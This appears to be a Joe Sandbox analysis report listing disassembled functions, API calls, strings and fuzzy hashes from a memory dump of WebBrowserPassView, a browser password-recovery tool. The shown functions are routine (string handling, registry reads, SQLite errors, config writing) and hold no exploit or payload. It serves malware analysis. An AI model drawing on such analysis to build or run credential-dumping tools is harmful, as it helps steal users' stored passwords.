Opcode Fuzzy Hash: 6f2a1b8eab8695b849e3f90b76870ba262ffa8b6eec972095743b55347378454
Instruction Fuzzy Hash: 66019BB1A002197AD720A759CC41FFE776CEF45748F1140BBBA08F3152D7389E598BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004465D6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

wcscpy.MSVCRT ref: 004465EB
wcscat.MSVCRT ref: 004465FA
wcscat.MSVCRT ref: 0044660B
wcscat.MSVCRT ref: 0044661A
VerQueryValueW.VERSION(?,?,00000000,?), ref: 00446634

Part of subcall function 00409F85: wcslen.MSVCRT ref: 00409F8C
Part of subcall function 00409F85: memcpy.MSVCRT ref: 00409FA2

Part of subcall function 0040A04F: lstrcpyW.KERNEL32 ref: 0040A064
Part of subcall function 0040A04F: lstrlenW.KERNEL32(?), ref: 0040A06B

Strings

\StringFileInfo\, xrefs: 004465E5

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
String ID: \StringFileInfo\
API String ID: 393120378-2245444037
Opcode ID: d4165d7f50266fa13a5b531a4f01ad866930043b5560520190855b71b76da5e1
Instruction ID: ad7517ef6bb7be25d6ac765d434d23ce8d777cc6758ad1086d9e8c390f57c567
Opcode Fuzzy Hash: d4165d7f50266fa13a5b531a4f01ad866930043b5560520190855b71b76da5e1
Instruction Fuzzy Hash: F3019A72A00209A6DB50AAA1CC06DDF77ACAB05304F0105BBB954E2013EE38DB869A5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040DA84 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 0040DAA9
wcscpy.MSVCRT ref: 0040DACC

Strings

dialog_%d, xrefs: 0040DA9D
menu_%d, xrefs: 0040DA8D
strings, xrefs: 0040DAB7
general, xrefs: 0040DAC2

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: _snwprintfwcscpy
String ID: dialog_%d$general$menu_%d$strings
API String ID: 999028693-502967061
Opcode ID: 2d27ce870dcdc0356c472e238f6887c9b469fb6313562511eb920d5e3df5e042
Instruction ID: 49826c5e287938e985e88a530ad471c797b7a96a0663e00b3f963554c3d6ef55
Opcode Fuzzy Hash: 2d27ce870dcdc0356c472e238f6887c9b469fb6313562511eb920d5e3df5e042
Instruction Fuzzy Hash: 5CE04F31F9D30071E82421D20D02B5A26608AA5B2AFB14867FD06B41E3E1BD859D5C0F

Uniqueness

Uniqueness Score: -1.00%

Function 0044632F Relevance: 10.2, APIs: 8, Instructions: 183COMMON

Download Yara Rule

APIs

memchr.MSVCRT ref: 0044636A
memcpy.MSVCRT ref: 0044640E
memcpy.MSVCRT ref: 00446420
memcpy.MSVCRT ref: 00446448
memcpy.MSVCRT ref: 0044645A
memcpy.MSVCRT ref: 0044646C
memcpy.MSVCRT ref: 004464BB
memset.MSVCRT ref: 00446509

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memcpy$memchrmemset
String ID:
API String ID: 1581201632-0
Opcode ID: 4d233e4afd6ff29041f3c6f611680654f4aa68e75756faee7c9936c8c726fefb
Instruction ID: a6c008d970df26256353228000b1674c0094f59a7a9bfa7c7c5a6d2f045070f8
Opcode Fuzzy Hash: 4d233e4afd6ff29041f3c6f611680654f4aa68e75756faee7c9936c8c726fefb
Instruction Fuzzy Hash: 3A5106719002186BDF10EF64DC81EEEBBB9AF05304F05486BF555D3246E738EA44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00404701 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00404765

Part of subcall function 00404683: memcpy.MSVCRT ref: 004046AF

memset.MSVCRT ref: 004047B1
memcpy.MSVCRT ref: 004047C4
memcpy.MSVCRT ref: 004047D7
memcpy.MSVCRT ref: 0040481D
memcpy.MSVCRT ref: 00404830
memcpy.MSVCRT ref: 0040485D
memcpy.MSVCRT ref: 00404872

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memcpy$memsetstrlen
String ID:
API String ID: 2350177629-0
Opcode ID: 85ae6cca462db74fc9d517c8532b09502b655fda8b3ede5b79185c6b0435583b
Instruction ID: d0b86a8e0b1ed09a54c1958bd2773174a4505737e3a5990953cddb4a85005ec9
Opcode Fuzzy Hash: 85ae6cca462db74fc9d517c8532b09502b655fda8b3ede5b79185c6b0435583b
Instruction Fuzzy Hash: 4351F3B290050DBEEB41DAE8CC41FDFB7BDAB09304F014475F708E6151E6759A498BA6

Uniqueness

Uniqueness Score: -1.00%

Function 0042CD1D Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0042CD9C

Strings

8, xrefs: 0042CEB4
GROUP, xrefs: 0042CF59
ORDER, xrefs: 0042CF27
a GROUP BY clause is required before HAVING, xrefs: 0042CFCB
aggregate functions are not allowed in the GROUP BY clause, xrefs: 0042CFDF

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset
String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
API String ID: 2221118986-1606337402
Opcode ID: b08f1c7c1c784f11e339bc558d21b342480e82a29914c690e576521ecfd1ee8c
Instruction ID: 5991db5cdfe02a92001a53b2659b7cff3bc1ad689f245b1de322542099a0f38c
Opcode Fuzzy Hash: b08f1c7c1c784f11e339bc558d21b342480e82a29914c690e576521ecfd1ee8c
Instruction Fuzzy Hash: BE818D716083219FCB10CF15E48161FBBE1BF94314F95886FE88897292D378ED44CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C871 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040B7D1: free.MSVCRT(?,0040B282,00000000,?,00000000), ref: 0040B7D4
Part of subcall function 0040B7D1: free.MSVCRT(?,?,0040B282,00000000,?,00000000), ref: 0040B7DC

Part of subcall function 00416466: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00416C27,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,004148A8,?,?,00000000), ref: 00416479

Part of subcall function 0040AFF4: free.MSVCRT(?,00000000,?,0040B34B,00000000,?,00000000), ref: 0040B003

memset.MSVCRT ref: 0040C8E7
RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C915
_wcsupr.MSVCRT ref: 0040C92F

Part of subcall function 0040AEF6: wcslen.MSVCRT ref: 0040AF08
Part of subcall function 0040AEF6: free.MSVCRT(?,00000001,?,00000000,?,?,0040B39C,?,000000FF), ref: 0040AF2E
Part of subcall function 0040AEF6: free.MSVCRT(?,00000001,?,00000000,?,?,0040B39C,?,000000FF), ref: 0040AF51
Part of subcall function 0040AEF6: memcpy.MSVCRT ref: 0040AF75

memset.MSVCRT ref: 0040C97E
RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C9A9
RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C9B6

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
String ID:
API String ID: 4131475296-0
Opcode ID: 1290e4622d55d7778ea9b69d658d0e3d51195a8fe7ccda0e01a222ca3552e657
Instruction ID: 00aa335d5cf85b89362f6a9aadfcc732b8efce75ac460415b761aff3ddc3b274
Opcode Fuzzy Hash: 1290e4622d55d7778ea9b69d658d0e3d51195a8fe7ccda0e01a222ca3552e657
Instruction Fuzzy Hash: FA41EFB2D00119BBDB10EF95DC85AEFB7BCEF48304F10417AB514F6191D7749A448BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A521 Relevance: 9.1, APIs: 6, Instructions: 78COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041A553
GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041A561
free.MSVCRT(00000000), ref: 0041A5A7

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: AttributesFilefreememset
String ID:
API String ID: 2507021081-0
Opcode ID: 3f26cb4930ba2ae58a9a28ad6dda560801c2adcc14f28edc482860ed1ce7c104
Instruction ID: 7395bd2a308086f3fd2d4c6b452b5aa1ac1e70db218c9d4fbfcd5f8a884c914b
Opcode Fuzzy Hash: 3f26cb4930ba2ae58a9a28ad6dda560801c2adcc14f28edc482860ed1ce7c104
Instruction Fuzzy Hash: B2110A7290A119FBDB21AFA48C809FF33AAEB45354B51013BF915E2284D6388DD5926F

Uniqueness

Uniqueness Score: -1.00%

Function 0041944C Relevance: 9.1, APIs: 6, Instructions: 61COMMON

Download Yara Rule

APIs

AreFileApisANSI.KERNEL32 ref: 00419453
MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00419471
malloc.MSVCRT ref: 0041947B
MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00419492
free.MSVCRT(?), ref: 0041949B
free.MSVCRT(?,?), ref: 004194B9

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWidefree$ApisFilemalloc
String ID:
API String ID: 4131324427-0
Opcode ID: fd694bdbf1a5288751afab5916eb464ac1068d8597691c81853ece6260929c55
Instruction ID: d2ec6eabaf1a5e80c3afeaedd941492bb30a106db416a89a7fee490f69d676c2
Opcode Fuzzy Hash: fd694bdbf1a5288751afab5916eb464ac1068d8597691c81853ece6260929c55
Instruction Fuzzy Hash: 5E01D472609125BBAB116AA59C01DEF379CDF463747210336FC15E3280EA28CD4242BD

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0EE Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(000000E6,?,?,00419CBA), ref: 0041A132
GetTempPathA.KERNEL32(000000E6,?,?,00419CBA), ref: 0041A15A
free.MSVCRT(00000000,00455E58,00000000), ref: 0041A182

Strings

%s\etilqs_, xrefs: 0041A1D9
etilqs_, xrefs: 0041A18A

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: PathTemp$free
String ID: %s\etilqs_$etilqs_
API String ID: 924794160-1420421710
Opcode ID: bab2ed1f527ee8a656d929be1b160a4a852a5d62a151918d7f1c5c0f436632ca
Instruction ID: 86187f938b98f06affb9dfa87fa418505d5dbd7a5a9bd49ee38ced054dacd9ce
Opcode Fuzzy Hash: bab2ed1f527ee8a656d929be1b160a4a852a5d62a151918d7f1c5c0f436632ca
Instruction Fuzzy Hash: 8E312831A092496AE725A765DC41BFF73A89B54308F1404BFE846C2283EF7C9EC5865E

Uniqueness

Uniqueness Score: -1.00%

Function 00411618 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411649

Part of subcall function 0040A189: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040E194,00000000,0040E047,?,00000000,00000208,?), ref: 0040A194

wcsrchr.MSVCRT ref: 00411667
wcscat.MSVCRT ref: 00411681

Strings

General, xrefs: 0041168B
.cfg, xrefs: 0041167B

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: FileModuleNamememsetwcscatwcsrchr
String ID: .cfg$General
API String ID: 776488737-1188829934
Opcode ID: 05d865f8f1fbf1afa81b1740172245d7630aa72eb646d50dbed4ba79973170d9
Instruction ID: 118cea2e70e189b156e6f7c6b3a683fd49b902604a6a275d9fc0e819739e64fb
Opcode Fuzzy Hash: 05d865f8f1fbf1afa81b1740172245d7630aa72eb646d50dbed4ba79973170d9
Instruction Fuzzy Hash: E711933250121C6ADB10EF51CC85ACA7368BF54714F1404EBE908AB142D775ABD88B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040F8D7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040F90E

Part of subcall function 00416DE5: memcpy.MSVCRT ref: 00416E62

Part of subcall function 0040F0F7: wcscpy.MSVCRT ref: 0040F0FC
Part of subcall function 0040F0F7: _wcslwr.MSVCRT ref: 0040F137

_snwprintf.MSVCRT ref: 0040F958

Strings

<item>, xrefs: 0040F8E1
</item>, xrefs: 0040F974
<%s>%s</%s>, xrefs: 0040F94B

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
String ID: <%s>%s</%s>$</item>$<item>
API String ID: 1775345501-2769808009
Opcode ID: 795fdbf1178cbb4566f4ded2e51011bbdab7768b91a9f779536e95c46b73b6be
Instruction ID: e757c57b7439aa271c71178676e27b4ad6085045d172985a4d63abbb6152d9b4
Opcode Fuzzy Hash: 795fdbf1178cbb4566f4ded2e51011bbdab7768b91a9f779536e95c46b73b6be
Instruction Fuzzy Hash: D611C435600309BBDB21AF29CC82E997B25FF04708F10007AF90467A93C339F968DB88

Uniqueness

Uniqueness Score: -1.00%

Function 00416644 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON

Download Yara Rule

APIs

wcscpy.MSVCRT ref: 00416653
wcscpy.MSVCRT ref: 0041666E
CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,004116BA,?,General,?,00000000,00000001), ref: 00416695
CloseHandle.KERNEL32(00000000), ref: 0041669C

Strings

General, xrefs: 00416668

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: wcscpy$CloseCreateFileHandle
String ID: General
API String ID: 999786162-26480598
Opcode ID: ed3c1823b04d3e0c62bd7214a39938c8b74bf6441286b00033080fb2913483c2
Instruction ID: f01d66d13555934190104f6a09e645eb52914f374063e62784237bdfd735f1bc
Opcode Fuzzy Hash: ed3c1823b04d3e0c62bd7214a39938c8b74bf6441286b00033080fb2913483c2
Instruction Fuzzy Hash: 2CF059B3109300BFF7206B619C85EAB77DCDF40318F12883FF04891141CA398C94866E

Uniqueness

Uniqueness Score: -1.00%

Function 0040DBA3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040DBC8
GetPrivateProfileStringW.KERNEL32 ref: 0040DBF0
WritePrivateProfileStringW.KERNEL32(0045E668,?,?,0045E458), ref: 0040DC12

Strings

XE, xrefs: 0040DBD0
hE, xrefs: 0040DBEA

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: PrivateProfileString$Writememset
String ID: XE$hE
API String ID: 747731527-2175974288
Opcode ID: ede71be8cfb000d6f647e9b079099f0124216ddcdab21ee2ea2fb028081f9ff6
Instruction ID: 3f24a6620cd36916ca3736dea7931fee652e2a6ad1dc5343ab1a7f2c6f25142e
Opcode Fuzzy Hash: ede71be8cfb000d6f647e9b079099f0124216ddcdab21ee2ea2fb028081f9ff6
Instruction Fuzzy Hash: 81F06836950354FAFB115B51CC4DFCB3B68EB55755F004076FB04A1182D7B88A48C6AD

Uniqueness

Uniqueness Score: -1.00%

Function 00409CFB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,004101B0,00000000,?,004122A5,00000000,00000000,?,00000000,00000000,00000000), ref: 00409D0F
_snwprintf.MSVCRT ref: 00409D3C
MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409D55

Strings

Error %d: %s, xrefs: 00409D2B
Error, xrefs: 00409D46

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ErrorLastMessage_snwprintf
String ID: Error$Error %d: %s
API String ID: 313946961-1552265934
Opcode ID: e1fdb32dfef422dff48cb9ab629eed33cb04251586a29e7e9f8c167c9a74f7e6
Instruction ID: d9c3214ff741d8e793b5fb5d5340e1d373de9dbbbbb1b4938000c24ebbed5cab
Opcode Fuzzy Hash: e1fdb32dfef422dff48cb9ab629eed33cb04251586a29e7e9f8c167c9a74f7e6
Instruction Fuzzy Hash: BFF0277A51020867DB11A794CC02FDA73ACAB45796F0400BBB944A2141DAB89E488E68

Uniqueness

Uniqueness Score: -1.00%

Function 00437897 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 390COMMON

Download Yara Rule

Strings

oid, xrefs: 00437961
foreign key constraint failed, xrefs: 00437B37
old, xrefs: 0043791B
new, xrefs: 00437925

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID:
String ID: foreign key constraint failed$new$oid$old
API String ID: 0-1953309616
Opcode ID: 78d1a63a5ea67a9e42337c47af4419ff18a1c500e7b5e2e5722190ef6454fa26
Instruction ID: 80b6a815d8446b075644860295f848db11862a5b470e777900e0cbaee52b5eda
Opcode Fuzzy Hash: 78d1a63a5ea67a9e42337c47af4419ff18a1c500e7b5e2e5722190ef6454fa26
Instruction Fuzzy Hash: 50E19FB1E04209AFDB14DFA5D881AEEBBB5FF48304F10842EE805AB351DB799A41CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004350BF Relevance: 7.8, APIs: 2, Strings: 3, Instructions: 334COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004350D4
memset.MSVCRT ref: 004351CD

Strings

VtC, xrefs: 0043544D, 004350F6, 00435167, 004351D2, 004352AB
VtC, xrefs: 00435217, 004351B9, 00435239, 0043524C, 004352CD, 0043535C, 00435399
rows deleted, xrefs: 00435438

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset
String ID: VtC$VtC$rows deleted
API String ID: 2221118986-3271433201
Opcode ID: 285e4370a89cc5d60ce435c08b76b458e0c9e97a2273653d553d833e96bb1a07
Instruction ID: 8eee3fd8308e863b15c20577b933f05ddeb2eec06ba64818cf6e3fd673dab534
Opcode Fuzzy Hash: 285e4370a89cc5d60ce435c08b76b458e0c9e97a2273653d553d833e96bb1a07
Instruction Fuzzy Hash: 70C1C071E00618ABDF21DF95CC42B9FBBB1EF48314F14105AF904AB282D779AE50DB99

Uniqueness

Uniqueness Score: -1.00%

Function 0043355E Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0043365E
memcpy.MSVCRT ref: 00433775

Strings

unknown column "%s" in foreign key definition, xrefs: 00433745
number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004335E2
foreign key on %s should reference only one column of table %T, xrefs: 004335BA

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

